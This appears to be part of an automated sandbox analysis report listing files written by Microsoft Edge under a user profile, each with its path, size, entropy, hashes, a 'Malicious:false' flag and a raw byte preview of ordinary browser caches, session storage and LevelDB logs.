                                                                                                                                                                                                                                                                                      SHA-512:021666146C7717976D0C16B00E044FA1A2BF70BDBCA438BF2B1C0898FDBFBD026C4A4F46DCA720514EC823A1F88BC4358D03C7D9F4F9AB7C2F80C5CA29C3DFF1
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:0\r..m..........rSG.....0....z3.................;.....x.`........,T.8..`,.....L`.....,T...`......L`......Rc.......exports...Rcn.......module....Rc:1}.....define....Rb..<....amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H........Q......9{...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true.a........Db............D`.....E..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da....@[...,T.`.`z.....L`..........a............a.........Dr8..............

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):24
                                                                                                                                                                                                                                                                                      Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                                                      MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                                                      SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                                                      SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                                                      SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:0\r..m..................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):72
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.5931902015385067
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:KYAyXl/lYV/lxEstllQgrw7tKln:KtKYWs+grwkl
                                                                                                                                                                                                                                                                                      MD5:12543714E2D286B589230D797A4A84FE
                                                                                                                                                                                                                                                                                      SHA1:61425FCE9FB9E1C79677DD6DF384E96F22550629
                                                                                                                                                                                                                                                                                      SHA-256:440EB4E3173EA708F377B28EE1409BE7AAF06576280C2F37713C267D174688AE
                                                                                                                                                                                                                                                                                      SHA-512:D8CBFEC9A5FA6F71C28FBCCB79B400227719BEC7E23685ABE3198E9EA4709E9680C65E5E31CD2CF029455C7BFCC82D6A38F84FC7CFB04D9009E8CC950119819D
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:@...?.W.oy retne.........................X....,..................U6./.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):72
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.5931902015385067
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:KYAyXl/lYV/lxEstllQgrw7tKln:KtKYWs+grwkl
                                                                                                                                                                                                                                                                                      MD5:12543714E2D286B589230D797A4A84FE
                                                                                                                                                                                                                                                                                      SHA1:61425FCE9FB9E1C79677DD6DF384E96F22550629
                                                                                                                                                                                                                                                                                      SHA-256:440EB4E3173EA708F377B28EE1409BE7AAF06576280C2F37713C267D174688AE
                                                                                                                                                                                                                                                                                      SHA-512:D8CBFEC9A5FA6F71C28FBCCB79B400227719BEC7E23685ABE3198E9EA4709E9680C65E5E31CD2CF029455C7BFCC82D6A38F84FC7CFB04D9009E8CC950119819D
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:@...?.W.oy retne.........................X....,..................U6./.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF3921f.TMP (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):72
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.5931902015385067
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:KYAyXl/lYV/lxEstllQgrw7tKln:KtKYWs+grwkl
                                                                                                                                                                                                                                                                                      MD5:12543714E2D286B589230D797A4A84FE
                                                                                                                                                                                                                                                                                      SHA1:61425FCE9FB9E1C79677DD6DF384E96F22550629
                                                                                                                                                                                                                                                                                      SHA-256:440EB4E3173EA708F377B28EE1409BE7AAF06576280C2F37713C267D174688AE
                                                                                                                                                                                                                                                                                      SHA-512:D8CBFEC9A5FA6F71C28FBCCB79B400227719BEC7E23685ABE3198E9EA4709E9680C65E5E31CD2CF029455C7BFCC82D6A38F84FC7CFB04D9009E8CC950119819D
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:@...?.W.oy retne.........................X....,..................U6./.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):5915
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.4009791913231564
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:c79MjuuyG9Xp+LL+ViE96Ll9iSrK1VhZvxVsfC3F7Y:c+j79Xp+HKiJLl9iSrKXhZ5V517
                                                                                                                                                                                                                                                                                      MD5:B0C9469A8D9E7DE28BDC19E333FD0857
                                                                                                                                                                                                                                                                                      SHA1:0A4398BAE10582357ED50B0D9E3962E128CF56A3
                                                                                                                                                                                                                                                                                      SHA-256:94AE545735B9AD35E679AF317E730D7A65B1A53664C5C41057A6474FF7805A73
                                                                                                                                                                                                                                                                                      SHA-512:786BE01FD64CBE9E581CB1A0BA4A21B8285B42F595C618F61E1A49E2B9CFAD3E273CD1C28E723C6736F98117A6127F7A2DE497BE6CEF518E73807E14A0F951AB
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................].b................next-map-id.1.Cnamespace-597b8143_f503_40b7_b109_8e8f4220b3dd-https://ntp.msn.com/.0V.e................V.e................V.e...................w.................map-0-shd_sweeper.+{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.p.r.g.-.m.s.n.-.b.l.s.b.i.d.m.,.p.r.g.-.c.g.-.c.r.o.s.a.l.o.c.1.,.p.r.g.-.a.d.s.p.e.e.k.,.p.r.g.-.p.r.2.-.w.i.d.g.e.t.-.t.a.b.,.1.s.-.f.c.r.y.p.t.,.p.r.g.-.c.o.o.k.i.e.s.y.n.c.,.1.s.-.n.t.f.2.-.e.v.l.c.f.c.,.1.s.-.n.t.f.2.-.b.k.n.l.c.,.1.s.-.n.t.f.2.-.i.p.t.l.c.,.1.s.-.p.r.2.-.e.v.l.c.,.1.s.-.p.r.2.-.e.v.l.c.b.b.,.1.s.-.p.r.2.-.e.v.l.c.h.,.1.s.-.p.r.2.-.e.v.l.c.n.,.1.s.-.p.r.2.-.e.v.l.c.r.p.,.1.s.-.p.r.2.-.e.v.l.c.t.,.1.s.-.p.r.g.2.-.l.i.f.e.c.y.c.l.e.,.1.s.-.w.p.o.-.p.r.2.-.n.c.a.r.d.,.1.s.-.w.p.o

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):330
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.168585507900992
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:DyfKUSS9+q2PcNwi23oH+TcwtrQMxIFUt8WyfKWlNJZmw+WyfK39VkwOcNwi23oM:fHS9+vLZYebCFUt8EWfJ/+Q39V54ZYeL
                                                                                                                                                                                                                                                                                      MD5:D95F6D13916965F1BC708C31FE4EEB66
                                                                                                                                                                                                                                                                                      SHA1:9D2E298308F6095C8417D0BF3EAB5F4F13B74C92
                                                                                                                                                                                                                                                                                      SHA-256:B9AD21CF663C8B624F9AEC1EB9C48E9468833CEB91A371367C174A0684DA5F76
                                                                                                                                                                                                                                                                                      SHA-512:17E5A42C354BB51DB58B935080BA13E8270647669E48B4216451046558222157AA0FD7C03BFE6C118CEA750DEF62F4F788F1D582AC523FDC454A41E38771CED8
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:22.921 184c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/27-03:05:22.923 184c Recovering log #3.2024/12/27-03:05:22.999 184c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):330
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.168585507900992
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:DyfKUSS9+q2PcNwi23oH+TcwtrQMxIFUt8WyfKWlNJZmw+WyfK39VkwOcNwi23oM:fHS9+vLZYebCFUt8EWfJ/+Q39V54ZYeL
                                                                                                                                                                                                                                                                                      MD5:D95F6D13916965F1BC708C31FE4EEB66
                                                                                                                                                                                                                                                                                      SHA1:9D2E298308F6095C8417D0BF3EAB5F4F13B74C92
                                                                                                                                                                                                                                                                                      SHA-256:B9AD21CF663C8B624F9AEC1EB9C48E9468833CEB91A371367C174A0684DA5F76
                                                                                                                                                                                                                                                                                      SHA-512:17E5A42C354BB51DB58B935080BA13E8270647669E48B4216451046558222157AA0FD7C03BFE6C118CEA750DEF62F4F788F1D582AC523FDC454A41E38771CED8
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:22.921 184c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/27-03:05:22.923 184c Recovering log #3.2024/12/27-03:05:22.999 184c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13379760324698647

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1443
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.842151352703171
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:3rainsl9MWwdpsAF4unxWBtLp3X2amEtG1ChqfJFUsJOQKkOAM4Z:3rai29MNzFGrLp2FEkChCFdJvHOpY
                                                                                                                                                                                                                                                                                      MD5:BADF6BB9376C10CE39C84F03AF14A7B4
                                                                                                                                                                                                                                                                                      SHA1:0AFFCC47E3CAE5FD7912AB819BBFCC6CA6B77443
                                                                                                                                                                                                                                                                                      SHA-256:768E10B19CDAA7B95FD07B476EC7C1CA97ABF726916D4B440F5DF613F4466F45
                                                                                                                                                                                                                                                                                      SHA-512:DA34901863BCE21BFA8D5FBF23BF5E290264C26BB3193D9E9F0364B4B24936F1A37A607DF2F5A017F7E9E2AB1D242AB0F9E9DC840054FC7DCC56A1566561C2AE
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SNSS.......(.uk...........(.uk......"(.uk...........(.uk.......(.uk.......).uk.......).uk....!..).uk...............................(.uk).uk1..,...).uk$...597b8143_f503_40b7_b109_8e8f4220b3dd...(.uk.......).uk....|..........(.uk...(.uk.......................(.uk....................5..0...(.uk&...{4B3AC14B-43E5-4896-86E8-9E7D502CE1B5}.....(.uk.......(.uk..........................).uk...........).uk........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x...........;*......;*.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                      MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                      SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                      SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                      SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):355
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.146672217215783
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:DyfJIq2PcNwi23oH+Tcwt7Uh2ghZIFUt8WyfOZmw+WyfikwOcNwi23oH+Tcwt7UT:NvLZYebIhHh2FUt8I/+Q54ZYebIhHLJ
                                                                                                                                                                                                                                                                                      MD5:83227E27951E679385A423FE3A135C65
                                                                                                                                                                                                                                                                                      SHA1:2B098425319FD7ECB01163BA3BA8D01B916C717D
                                                                                                                                                                                                                                                                                      SHA-256:F35C844903ADA2A15BFBE330C5E0E5F696E38AAE498730E6A84249F6F348EA61
                                                                                                                                                                                                                                                                                      SHA-512:ACB204588153AAA5D6E7747FFED9FE57425195C00E8F1114EE94F05088BBE95103C0CB2848D777B82981D1EB1FEF89CC59A20605AA647C83DB3977E6DD4C0C91
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:22.316 c90 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/27-03:05:22.317 c90 Recovering log #3.2024/12/27-03:05:22.317 c90 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):355
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.146672217215783
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:DyfJIq2PcNwi23oH+Tcwt7Uh2ghZIFUt8WyfOZmw+WyfikwOcNwi23oH+Tcwt7UT:NvLZYebIhHh2FUt8I/+Q54ZYebIhHLJ
                                                                                                                                                                                                                                                                                      MD5:83227E27951E679385A423FE3A135C65
                                                                                                                                                                                                                                                                                      SHA1:2B098425319FD7ECB01163BA3BA8D01B916C717D
                                                                                                                                                                                                                                                                                      SHA-256:F35C844903ADA2A15BFBE330C5E0E5F696E38AAE498730E6A84249F6F348EA61
                                                                                                                                                                                                                                                                                      SHA-512:ACB204588153AAA5D6E7747FFED9FE57425195C00E8F1114EE94F05088BBE95103C0CB2848D777B82981D1EB1FEF89CC59A20605AA647C83DB3977E6DD4C0C91
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:22.316 c90 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/27-03:05:22.317 c90 Recovering log #3.2024/12/27-03:05:22.317 c90 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):270336
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                      MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                      SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                      SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                      SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):270336
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                      MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                      SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                      SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                      SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):440
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.2368194404922885
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:yDM+vLZYebvqBQFUt8hg/+WDMV54ZYebvqBvJ:slYebvZg8zoYebvk
                                                                                                                                                                                                                                                                                      MD5:D9EF6E5754D1A07CAB59E7F8C256D217
                                                                                                                                                                                                                                                                                      SHA1:73CE23BA73D259D4CB43AB1D9A56A3993F613AD0
                                                                                                                                                                                                                                                                                      SHA-256:F25FF1617BC373D82EFE36445F8A3B92C6F23A8D8BF1B8A159E99CD42B63C524
                                                                                                                                                                                                                                                                                      SHA-512:F4FEE324476075E99D3D49684D18D7EA7BD64574D143A4EE3CF0C17CA193F16A05509AA72648BD65B1C640B5D5CD7257BE33D4820112835781CC444C56E9138B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:22.994 15fc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/27-03:05:22.996 15fc Recovering log #3.2024/12/27-03:05:22.999 15fc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):440
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.2368194404922885
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:yDM+vLZYebvqBQFUt8hg/+WDMV54ZYebvqBvJ:slYebvZg8zoYebvk
                                                                                                                                                                                                                                                                                      MD5:D9EF6E5754D1A07CAB59E7F8C256D217
                                                                                                                                                                                                                                                                                      SHA1:73CE23BA73D259D4CB43AB1D9A56A3993F613AD0
                                                                                                                                                                                                                                                                                      SHA-256:F25FF1617BC373D82EFE36445F8A3B92C6F23A8D8BF1B8A159E99CD42B63C524
                                                                                                                                                                                                                                                                                      SHA-512:F4FEE324476075E99D3D49684D18D7EA7BD64574D143A4EE3CF0C17CA193F16A05509AA72648BD65B1C640B5D5CD7257BE33D4820112835781CC444C56E9138B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:22.994 15fc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/27-03:05:22.996 15fc Recovering log #3.2024/12/27-03:05:22.999 15fc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\07cd62d8-48fb-4539-a1ca-1ce4b19ae658.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\49a96ccd-dae2-4b07-b911-d95c475e6764.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
